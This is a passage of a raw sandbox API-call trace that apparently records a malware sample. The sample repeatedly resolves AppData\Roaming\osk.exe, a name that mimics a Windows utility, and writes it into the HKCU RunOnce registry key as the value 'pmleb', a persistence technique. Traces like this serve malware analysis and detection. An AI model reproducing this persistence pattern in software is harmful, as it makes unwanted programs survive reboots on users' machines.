[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.424] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.424] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.425] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.425] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.425] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.425] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.425] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x79 [0080.425] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.425] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7a [0080.425] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.426] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x79 [0080.426] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.426] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.426] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0080.426] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.426] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.426] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.426] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.426] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.427] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.427] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.427] RegCloseKey (hKey=0x280) returned 0x0 [0080.427] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.427] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.427] SetTimer (hWnd=0x20280, nIDEvent=0x2079, uElapse=0xa, lpTimerFunc=0x0) returned 0x2079 [0080.427] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.439] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.439] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.439] KillTimer (hWnd=0x20280, uIDEvent=0x2079) returned 1 [0080.439] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.439] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.440] IUnknown:Release (This=0x787518) returned 0x1 [0080.440] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.440] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.440] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.440] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.440] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.440] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.440] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.440] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.440] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.440] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7a [0080.440] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.440] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7b [0080.441] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.441] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7a [0080.441] ??2@YAPAXI@Z () returned 0x2b53d78 [0080.442] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.442] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.442] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.442] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.442] 
SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.442] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.442] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.442] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.443] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.443] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", 
Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.443] RegCloseKey (hKey=0x280) returned 0x0 [0080.443] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.443] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.443] SetTimer (hWnd=0x20280, nIDEvent=0x207a, uElapse=0xa, lpTimerFunc=0x0) returned 0x207a [0080.443] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.455] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.455] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.455] KillTimer (hWnd=0x20280, uIDEvent=0x207a) returned 1 [0080.455] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.455] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.455] IUnknown:Release (This=0x787518) returned 0x1 [0080.455] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.456] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.456] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, 
pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.456] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.456] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.456] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.456] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.456] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.456] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, 
[4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.456] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7b [0080.456] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.456] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7c [0080.456] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.457] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7b [0080.457] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.457] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.457] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.457] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.457] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.458] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.458] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.458] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.458] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.458] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.458] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.458] RegCloseKey (hKey=0x280) returned 0x0 [0080.458] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.458] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.458] SetTimer (hWnd=0x20280, nIDEvent=0x207b, uElapse=0xa, lpTimerFunc=0x0) returned 0x207b [0080.459] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.470] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.470] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.470] KillTimer (hWnd=0x20280, uIDEvent=0x207b) returned 1 [0080.471] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.471] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.471] IUnknown:Release (This=0x787518) returned 0x1 [0080.471] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, 